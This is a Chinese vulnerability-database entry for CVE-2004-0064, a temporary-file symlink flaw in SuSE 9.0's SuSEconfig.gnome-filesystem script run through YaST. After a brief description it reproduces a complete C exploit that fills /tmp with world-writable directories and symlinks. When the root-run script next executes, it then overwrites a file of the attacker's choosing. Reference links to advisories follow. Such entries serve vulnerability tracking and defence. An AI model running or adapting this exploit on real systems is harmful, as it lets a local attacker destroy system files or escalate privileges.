https://www.exploit-db.com/exploits/144
https://www.securityfocus.com/bid/9411
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200402-078
SuSE YaST SuSEconfig.gnome-filesystem以不安全方式创建临时文件漏洞






漏洞ID | 1107632 | 漏洞类型 | 其他 |
发布时间 | 2004-01-15 | 更新时间 | 2004-01-15 |
![]() |
CVE-2004-0064 | ![]() |
CNNVD-200402-078 |
漏洞平台 | Linux | CVSS评分 | 2.1 |
|漏洞来源
|漏洞详情
SuSE是一款开放源代码Linux系统。SuSEconfig.gnome-filesystem以不安全方式创建临时文件,本地攻击者可以利用这个漏洞利用符号连接攻击对系统文件进行破坏。在通过YaST执行脚本后,会建立'/tmp/tmp.SuSEconfig.gnome-filesystem.$RANDOM'临时文件,其中RANDOM为随机数(一般在1到33000之间),文件建立权限为任何用户可写,通过建立符号链接指向系统任意文件,当执行时可覆盖符号链接指向的文件,可导致系统崩溃或权限提升。
|漏洞EXP
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#define PATH "/tmp/tmp.SuSEconfig.gnome-filesystem."
#define START 1
#define END 33000
int main(int argc, char **argv)
{
int i;
char buf[150];
printf("\tSuSE 9.0 YaST script
SuSEconfig.gnome-filesystem exploit\n");
printf("\t-------------------------------------------------------------
\n");
printf("\tdiscovered and written by l0om
<l0om excluded org>\n");
printf("\t WWW.EXCLUDED.ORG\n\n");
if(argc != 2) {
printf("usage: %s <destination-file>\n",argv[0]);
exit(0xff);
}
printf("### hit enter to create or overwrite file %
s: ",argv[1]); fflush(stdout);
read(1, buf, 1); fflush(stdin);
umask(0000);
printf("working\n\n");
for(i = START; i < END; i++) {
snprintf(buf, sizeof(buf),"%s%d",PATH,i);
if(mkdir(buf,00777) == -1) {
fprintf(stderr, "cannot creat directory [Nr.%d]
\n",i);
exit(0xff);
}
if(!(i%1000))printf(".");
strcat(buf, "/found");
if(symlink(argv[1], buf) == -1) {
fprintf(stderr, "cannot creat symlink from %s to %s
[Nr.%d]\n",buf,argv[1],i);
exit(0xff);
}
}
printf("\ndone!\n");
printf("next time the SuSE.gnome-filesystem script
gets executed\n");
printf("we will create or overwrite file %s
\n",argv[1]);
return(0x00);
} /* i cant wait for the new gobbles comic!! */
// milw0rm.com [2004-01-15]
|受影响的产品
S.u.S.E. SuSEconfig.gnome-filesystem
+
S.u.S.E. Linux Personal 9.0
|参考资料
来源:BID
名称:9411
链接:http://www.securityfocus.com/bid/9411
来源:SECTRACK
名称:1008703
链接:http://www.securitytracker.com/id?1008703
来源:OSVDB
名称:3460
链接:http://www.osvdb.org/3460
来源:SECUNIA
名称:10623
链接:http://secunia.com/advisories/10623
来源:BUGTRAQ
名称:20040113SuSElinux9.0YaSTconfigSkribt[exploit]
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=107402658600437&w=2
检索漏洞
开始时间
结束时间